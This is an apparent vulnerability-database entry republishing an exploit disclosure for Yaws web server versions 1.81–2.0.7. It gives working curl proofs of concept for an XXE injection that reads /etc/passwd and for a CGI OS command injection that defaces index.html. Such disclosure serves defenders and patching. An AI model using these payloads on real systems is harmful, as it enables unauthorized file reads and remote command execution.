Yaws 2.0.7 XML Injection / Command Injection

🗓️ 08 Sep 2020 00:00:00Reported by Alexey ProninType

packetstorm🔗 packetstormsecurity.com👁 675 Views

Yaws 2.0.7 XML Injection / Command Injection vulnerabilitie

Reporter	Title	Published	Views	Family All 41
ArchLinux	[ASA-202009-14] yaws: multiple issues	26 Sep 202000:00	–	archlinux
BDU FSTEC	The vulnerability of the Yaws CGI web server lies in the lack of measures to neutralize special elements, which allows attackers to access confidential data, compromise its integrity, and cause service failures.	30 Mar 202100:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the Yaws WebDAV server implementation lies in the improper restriction of XML links to external objects. This allows attackers to access confidential data, compromise its integrity, and cause service failures.	30 Mar 202100:00	–	bdu_fstec
GithubExploit	Exploit for OS Command Injection in Yaws	6 Aug 202009:01	–	githubexploit
Check Point Advisories	Arbitrary Code Execution Over HTTP Traffic (CVE-2011-2523; CVE-2019-18345; CVE-2019-19143; CVE-2020-15492; CVE-2020-16210; CVE-2020-21526; CVE-2020-24379; CVE-2020-6142; CVE-2020-8010; CVE-2020-9380)	18 Nov 202000:00	–	checkpoint_advisories
Check Point Advisories	HTTP Authenticated OS Command Injection (CVE-2020-17408; CVE-2020-24916; CVE-2020-25079; CVE-2020-3117; CVE-2020-7049)	17 Dec 202000:00	–	checkpoint_advisories
CVE	CVE-2020-24379	9 Sep 202018:10	–	cve
CVE	CVE-2020-24916	9 Sep 202018:10	–	cve
Cvelist	CVE-2020-24379	9 Sep 202018:10	–	cvelist
Cvelist	CVE-2020-24916	9 Sep 202018:10	–	cvelist

`# Exploit Title: Multiple vulnerabilities in Yaws web server  
# Date: 2020-08-10  
# Exploit Author: Alexey Pronin （vulnbe）  
# Vendor Homepage: http://yaws.hyber.org/  
# Software Link: https://github.com/erlyaws/yaws  
# Versions affected: 1.81 - 2.0.7  
# CVE: CVE-2020-24379, CVE-2020-24916  
  
1. Description:  
----------------------  
  
Yaws versions 1.81 to 2.0.7 are vulnerable to XXE and OS command injections.  
  
2. XXE injection Proof of Concept (CVE-2020-24379)  
----------------------  
  
curl -i -s -k -X LOCK http://localhost:8000/ -H 'Timeout: Second-1' \  
--data-binary @- << EOF  
<?xml version="1.0" encoding="utf-8" ?>  
<!DOCTYPE r [  
<!ELEMENT r ANY >  
<!ENTITY sp SYSTEM "file:///etc/passwd">  
]>  
<d:lockinfo xmlns:d="DAV:">  
<d:lockscope><d:exclusive/></d:lockscope>  
<d:locktype><d:write/></d:locktype>  
<d:owner>  
<d:href><r>&sp;</r></d:href>  
</d:owner>  
</d:lockinfo>  
EOF  
  
3. OS command injection Proof of Concept (CVE-2020-24916)  
----------------------  
  
curl 'http://127.0.0.1:8000/cgi-bin/%22%60export%20Z=$(pwd%7Ccut%20-c1);echo%20pawned%20completely%3E%3E..$Z%22%22index.html%60%22'  
  
4. References  
----------------------  
  
* Vulnerability details: https://vuln.be/post/yaws-xxe-and-shell-injections/  
* XXE injection PoC: https://github.com/vulnbe/poc-yaws-dav-xxe)  
* Shell injection PoC: https://github.com/vulnbe/poc-yaws-cgi-shell-injection  
`

08 Sep 2020 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.44255